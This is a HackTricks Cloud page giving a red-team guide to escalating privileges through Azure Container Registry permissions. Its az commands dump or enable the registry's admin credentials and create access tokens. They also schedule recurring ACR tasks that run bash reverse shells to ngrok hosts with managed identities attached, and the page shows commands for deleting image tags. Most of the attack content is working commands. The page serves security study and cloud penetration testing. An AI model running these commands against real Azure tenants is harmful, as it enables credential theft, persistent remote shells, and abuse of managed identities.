HackTricks CloudAz - Azure Container Registry Privesc
Reading time: 5 minutes
tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Azure Container Registry
Fore more information check:
Microsoft.ContainerRegistry/registries/listCredentials/action
This permission allows the user to list the admin credentials of the ACR. This is useful to get full access over the registry
az rest --method POST \
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ContainerRegistry/registries/<registry-name>/listCredentials?api-version=2023-11-01-preview"
In case the admin credentials aren't enabled, you will also need the permission Microsoft.ContainerRegistry/registries/write to enable them with:
az rest --method PATCH --uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ContainerRegistry/registries/<registry-name>?api-version=2023-11-01-preview" --body '{"properties": {"adminUserEnabled": true}}'
Microsoft.ContainerRegistry/registries/tokens/write, Microsoft.ContainerRegistry/registries/generateCredentials/action
These permissions allow the user to create a new token with passwords to access the registry.
To use the az clito generate it as in the following example you will also need the permissions Microsoft.ContainerRegistry/registries/read, Microsoft.ContainerRegistry/registries/scopeMaps/read, Microsoft.ContainerRegistry/registries/tokens/operationStatuses/read, Microsoft.ContainerRegistry/registries/tokens/read
az acr token create \
--registry <registry-name> \
--name <token-name> \
--scope-map _repositories_admin
Microsoft.ContainerRegistry/registries/listBuildSourceUploadUrl/action, Microsoft.ContainerRegistry/registries/scheduleRun/action, Microsoft.ContainerRegistry/registries/runs/listLogSasUrl/action
These permissions allow the user to build and run an image in the registry. This can be used to execute code in the container.
[!WARNING] However, the image will be executed in a sandboxed environment and without access to the metadata service. This means that the container will not have access to the instance metadata so this isn't really useful to escalate privileges
# Build
echo 'FROM ubuntu:latest\nRUN bash -c "bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/17585 0>&1"\nCMD ["/bin/bash", "-c", "bash -i >& /dev/tcp//2.tcp.eu.ngrok.io/17585 0>&1"]' > Dockerfile
az acr run --registry 12345TestingRegistry --cmd '$Registry/rev/shell:v1:v1' /dev/null
Microsoft.ContainerRegistry/registries/tasks/write
This is the main permission that allows to create and update a task in the registry. This can be used to execute a code inside a container with a managed identity attached to it in the container.
This is the example on how to execute a reverseh shell in a container with the system managed identity attached to it:
az acr task create \
--registry <registry-name> \
--name reverse-shell-task \
--image rev/shell:v1 \
--file ./Dockerfile \
--context https://github.com/carlospolop/Docker-rev.git \
--assign-identity \
--commit-trigger-enabled false \
--schedule "*/1 * * * *"
Another way to get a RCE from a task without using an external repository is to use the az acr task create command with the --cmd flag. This will allow you to run a command in the container. For example, you can run a reverse shell with the following command:
az acr task create \
--registry <registry-name> \
--name reverse-shell-task-cmd \
--image rev/shell2:v1 \
--cmd 'bash -c "bash -i >& /dev/tcp/4.tcp.eu.ngrok.io/15508 0>&1"' \
--schedule "*/1 * * * *" \
--context /dev/null \
--commit-trigger-enabled false \
--assign-identity
tip
Note that to assign the system managed identity you don't need any special permission, although it must have been enabled before in the registry and assigned some permissions for it to be useful.
To assign a user managed identity also you would need the permission Microsoft.ManagedIdentity/userAssignedIdentities/assign/action to do:
az acr task create \
--registry <registry-name> \
--name reverse-shell-task \
--image rev/shell:v1 \
--file ./Dockerfile \
--context https://github.com/carlospolop/Docker-rev.git \
--assign-identity \[system\] "/subscriptions/<subscription-id>>/resourcegroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<mi-name>" \
--commit-trigger-enabled false \
--schedule "*/1 * * * *"
To update the repo of an existent task you can do:
az acr task update \
--registry <registry-name> \
--name reverse-shell-task \
--context https://github.com/your-user/your-repo.git
Microsoft.ContainerRegistry/registries/importImage/action
With this permission it's possible to import an image to the azure registry, even without having the image locally. However, note that you cannot import an image with a tag that already exists in the registry.
# Push with az cli
az acr import \
--name <registry-name> \
--source mcr.microsoft.com/acr/connected-registry:0.8.0 # Example of a repo to import
In order to untag or delete a specific image tag from the registry you can use the following command. However, note that you will need a user or token with enough permissions to do it:
az acr repository untag \
--name <registry-name> \
--image <image-name>:<tag>
az acr repository delete \
--name <registry-name> \
--image <image-name>:<tag>
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.